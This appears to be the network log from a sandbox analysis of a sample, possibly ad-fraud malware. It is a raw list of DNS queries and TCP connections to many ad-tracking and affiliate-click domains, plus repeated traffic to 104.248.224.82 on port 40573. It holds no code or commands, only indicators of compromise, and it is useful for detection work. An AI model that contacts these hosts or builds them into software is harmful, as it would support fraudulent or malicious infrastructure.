US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 safebrowsing.googleapis.com udp
NL 142.250.179.202:443 safebrowsing.googleapis.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
SG 161.117.71.226:443 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 104.248.224.82:40573 tcp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 8.8.8.8:53 offersix.info udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 giftsendmedia.com udp
US 172.67.128.160:80 giftsendmedia.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 74.125.203.17:443 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 giftsendmedia.com udp
US 172.67.128.160:443 giftsendmedia.com tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 giftsendmedia.com udp
US 104.21.1.56:443 giftsendmedia.com tcp
US 8.8.8.8:53 giftsendmedia.com udp
US 172.67.128.160:443 giftsendmedia.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 giftsendmedia.com udp
US 172.67.128.160:443 giftsendmedia.com tcp
US 8.8.8.8:53 giftsendmedia.com udp
US 172.67.128.160:443 giftsendmedia.com tcp
US 8.8.8.8:53 giftsendmedia.com udp
US 172.67.128.160:443 giftsendmedia.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 giftsendmedia.com udp
US 172.67.128.160:443 giftsendmedia.com tcp
US 8.8.8.8:53 track.mialltrack2.com udp
US 52.202.247.75:443 track.mialltrack2.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 track.mialltrack2.com udp
US 54.235.136.87:443 track.mialltrack2.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 track.mialltrack2.com udp
US 8.8.8.8:53 wmadv.go2cloud.org udp
US 8.8.8.8:53 giftsendmedia.com udp
US 34.198.147.111:443 wmadv.go2cloud.org tcp
US 172.67.128.160:443 giftsendmedia.com tcp
US 52.202.247.75:443 track.mialltrack2.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 track.mialltrack2.com udp
US 8.8.8.8:53 clk.apxtrk.com udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 44.240.24.98:80 clk.apxtrk.com tcp
US 52.202.247.75:443 track.mialltrack2.com tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.127:443 impression.appsflyer.com tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 52.202.247.75:443 track.mialltrack2.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 godigitalpromo.g2afse.com udp
US 8.8.8.8:53 wmadv.go2cloud.org udp
US 8.8.8.8:53 tracking.leomob.com udp
SG 101.32.110.164:80 tracking.leomob.com tcp
NL 213.227.134.202:443 godigitalpromo.g2afse.com tcp
US 52.205.36.237:443 wmadv.go2cloud.org tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 104.22.7.191:443 adyourapp505.o18.click tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 spyke.trckswrm.com udp
DE 5.9.5.213:443 spyke.trckswrm.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 8.8.8.8:53 offersix.info udp
US 35.244.206.233:443 www.ghastrk.com tcp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 ad2click.go2affise.com udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
NL 213.227.134.204:443 ad2click.go2affise.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
US 104.248.224.82:40573 tcp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
US 104.248.224.82:40573 tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 8.8.8.8:53 www.trafficmob.net udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.43:443 impression.appsflyer.com tcp
US 8.8.8.8:53 cpi-offers.com udp
DE 52.58.210.58:443 cpi-offers.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 marlinads.g2afse.com udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
NL 213.227.135.231:443 marlinads.g2afse.com tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 d.la2-c1cs-ia4.salesforceliveagent.com udp
US 13.110.59.113:443 d.la2-c1cs-ia4.salesforceliveagent.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 t.9696.me udp
NL 212.7.209.75:443 t.9696.me tcp
US 8.8.8.8:53 ila3.co udp
DE 173.212.201.66:443 ila3.co tcp
US 8.8.8.8:53 bondika.g2afse.com udp
NL 213.227.156.21:443 bondika.g2afse.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 impression.appsflyer.com udp
US 104.248.224.82:40573 tcp
NL 65.9.83.76:443 impression.appsflyer.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 8.8.8.8:53 click.mnmnck.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 34.120.248.84:443 click.mnmnck.com tcp
US 8.8.8.8:53 track.paddlewaver.com udp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 apts.trckswrm.com udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
DE 88.99.70.114:443 apts.trckswrm.com tcp
US 8.8.8.8:53 ad-experience.g2afse.com udp
US 8.8.8.8:53 trk.antaituced.com udp
US 8.8.8.8:53 go2.enjoycpi.com udp
US 8.8.8.8:53 c.allontrk.com udp
US 8.8.8.8:53 lucazepa.com udp
US 8.8.8.8:53 direct2.knmasdfsdgs.com udp
NL 213.227.134.244:443 ad-experience.g2afse.com tcp
US 52.72.13.87:443 trk.antaituced.com tcp
DE 136.243.5.43:443 c.allontrk.com tcp
US 185.33.87.146:443 direct2.knmasdfsdgs.com tcp
US 8.8.8.8:53 aptrt.trckswrm.com udp
US 104.21.28.78:443 lucazepa.com tcp
US 8.8.8.8:53 biggerpicture.g2afse.com udp
NL 213.227.135.209:443 go2.enjoycpi.com tcp
DE 116.202.246.189:443 aptrt.trckswrm.com tcp
NL 213.227.135.229:443 biggerpicture.g2afse.com tcp
US 8.8.8.8:53 clicks.rtad.io udp
US 35.190.77.108:443 clicks.rtad.io tcp
SG 18.139.159.206:443 track.paddlewaver.com tcp
US 8.8.8.8:53 offersix.info udp
US 8.8.8.8:53 offersix.info udp
US 8.8.8.8:53 offersix.info udp
US 8.8.8.8:53 adyourapp505.o18.click udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 8.8.8.8:53 view.adjust.com udp
US 104.248.224.82:40573 tcp
US 130.211.37.129:443 www.trafficmob.net tcp
DE 185.151.204.50:443 view.adjust.com tcp
SG 172.104.40.4:80 offersix.info tcp
SG 172.104.40.4:80 offersix.info tcp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 click1.knmasdfsdgs.com udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 79.141.163.81:443 click1.knmasdfsdgs.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 go2.enjoycpi.com udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
NL 213.227.134.196:443 go2.enjoycpi.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 click.mnmnck.com udp
US 34.120.248.84:443 click.mnmnck.com tcp
US 8.8.8.8:53 apts.trckswrm.com udp
DE 168.119.211.149:443 apts.trckswrm.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 click.mnmnck.com udp
US 34.120.248.84:443 click.mnmnck.com tcp
DE 5.9.6.177:443 c.allontrk.com tcp
US 8.8.8.8:53 c.allontrk.com udp
DE 5.9.6.177:443 c.allontrk.com tcp
US 8.8.8.8:53 go2.enjoycpi.com udp
NL 213.227.134.196:443 go2.enjoycpi.com tcp
US 8.8.8.8:53 click.mnmnck.com udp
US 34.120.248.84:443 click.mnmnck.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 apts.trckswrm.com udp
DE 5.9.6.203:443 apts.trckswrm.com tcp
US 8.8.8.8:53 go2.enjoycpi.com udp
NL 213.227.135.209:443 go2.enjoycpi.com tcp
US 8.8.8.8:53 click.mnmnck.com udp
US 34.120.248.84:443 click.mnmnck.com tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 m5i6q.app.link udp
NL 65.9.83.52:443 m5i6q.app.link tcp
US 8.8.8.8:53 trk.interceptd.com udp
IE 54.154.126.202:443 trk.interceptd.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 aptrt.trckswrm.com udp
DE 157.90.33.241:443 aptrt.trckswrm.com tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.76:443 impression.appsflyer.com tcp
US 8.8.8.8:53 trk.antaituced.com udp
US 52.72.13.87:443 trk.antaituced.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 armr.trckswrm.com udp
US 104.248.224.82:40573 tcp
DE 157.90.33.241:443 armr.trckswrm.com tcp
US 8.8.8.8:53 ermitric.com udp
US 104.21.11.254:443 ermitric.com tcp
US 8.8.8.8:53 trk.antaituced.com udp
US 52.72.13.87:443 trk.antaituced.com tcp
US 8.8.8.8:53 aptrt.trckswrm.com udp
DE 157.90.33.241:443 aptrt.trckswrm.com tcp
US 8.8.8.8:53 c.allontrk.com udp
DE 136.243.5.43:443 c.allontrk.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 104.22.7.191:443 adyourapp505.o18.click tcp
US 8.8.8.8:53 offer.alibaba.com udp
US 8.8.8.8:53 track.2elementr.com udp
NL 213.227.135.207:443 track.2elementr.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
NL 23.66.22.51:443 offer.alibaba.com tcp
US 8.8.8.8:53 c.allontrk.com udp
DE 5.9.6.124:443 c.allontrk.com tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 8.8.8.8:53 adsapp.gotrackier.com udp
US 104.18.24.84:443 adsapp.gotrackier.com tcp
US 8.8.8.8:53 track.clickmyadz.com udp
US 88.214.195.198:443 track.clickmyadz.com tcp
US 8.8.8.8:53 click1.knmasdfsdgs.com udp
US 79.141.163.81:443 click1.knmasdfsdgs.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 direct2.knmasdfsdgs.com udp
US 185.33.87.146:443 direct2.knmasdfsdgs.com tcp
US 8.8.8.8:53 go-rilla.go2affise.com udp
NL 213.227.156.21:443 go-rilla.go2affise.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 spyke.trckswrm.com udp
DE 5.9.6.124:443 spyke.trckswrm.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 appad.g2afse.com udp
NL 213.227.135.229:443 appad.g2afse.com tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 spykemedia.g2afse.com udp
NL 213.227.156.19:443 spykemedia.g2afse.com tcp
US 8.8.8.8:53 trk.interceptd.com udp
IE 54.220.210.157:443 trk.interceptd.com tcp
US 8.8.8.8:53 trk.interceptd.com udp
IE 34.249.127.83:443 trk.interceptd.com tcp
US 8.8.8.8:53 ermitric.com udp
US 172.67.150.228:443 ermitric.com tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.76:443 impression.appsflyer.com tcp
US 8.8.8.8:53 srv6.feed-apps.com udp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 trk.interceptd.com udp
US 142.251.36.14:443 play.google.com tcp
US 104.21.92.3:443 srv6.feed-apps.com tcp
US 104.248.224.82:40573 tcp
IE 54.220.210.157:443 trk.interceptd.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 go-rilla.go2affise.com udp
NL 213.227.134.220:443 go-rilla.go2affise.com tcp
US 8.8.8.8:53 armr.trckswrm.com udp
DE 188.40.120.131:443 armr.trckswrm.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
